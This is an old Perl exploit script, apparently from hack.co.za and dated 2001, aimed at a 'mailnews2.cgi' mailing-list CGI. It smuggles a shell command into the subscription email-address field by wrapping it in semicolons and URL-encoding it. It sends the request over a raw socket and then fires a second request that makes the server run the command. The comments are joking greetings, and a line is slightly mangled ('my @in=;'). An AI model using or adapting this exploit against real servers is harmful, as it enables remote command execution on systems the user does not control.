#!/usr/bin/perl # nph-maillist hack... Kanedaaa [ kaneda@ac.pl ] # its add crazy @email, sends mails, and execute our code of coz ;] # greetzzz to all of Bohatery... [Breslau Kilerz, Lam3rz, my Mom, dog, # hamster... maybe this is not hamster..., wine, SobiechOS, wine, Cucumber # Team Members... yeah. i must go sleep. ;] # and #phreakpl,hackingpl :] # # . remember thats just simple sploit... You cant play in koules this.. ;] use Socket; # Ip... $ip="127.0.0.1"; # Command to run ... $command = 'echo ssij > /tmp/dupaaa'; # $command = ";".$command.";\@adamalysz.com"; ################################################# if (!$ARGV[0]) { print "....mailnews.cgi[writen by Claude Reuter] hack... Kanedaaa [kaneda\@ac.pl]\n"; print "Use the Force... Edit Source...\n"; print "1:./mailnews-ogorek.pl send - add our \@email to the list.\n"; print "2:./mailnews-ogorek.pl hack - sends action subscribe and execute our code.\n"; } if ($ARGV[0] eq "send") { &send } if ($ARGV[0] eq "hack") { &hack } sub send { ### # Change ascii to hex... $command =~ s/([^\w\!*-])/sprintf("%%%02X",ord($1))/ge; $l = length($command) + 25; $tosend = "POST /cgi-bin/mailnews2.cgi HTTP/1.0\r\n". "Referer:http://$ip/cgi-bin/mailnews2.cgi\r\n". "Content-length: $l\r\n\r\n". "action=subscribe&address=$command\r\n\r\n\r\n"; print $command; print sendraw($tosend); } sub hack { $tosend="GET /cgi-bin/mailnews2.cgi?news HTTP/1.0\r\n". "Referer: http://$ip/cgi-bin/mailnews2.cgi\r\n\r\n"; print sendraw($tosend); } ##################################################### # Ripped from some RFP code... :]] I will infuse good Tea for You... # I`am the best Infuser of Tea in .pl ... :] sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } # www.hack.co.za [19 April 2001]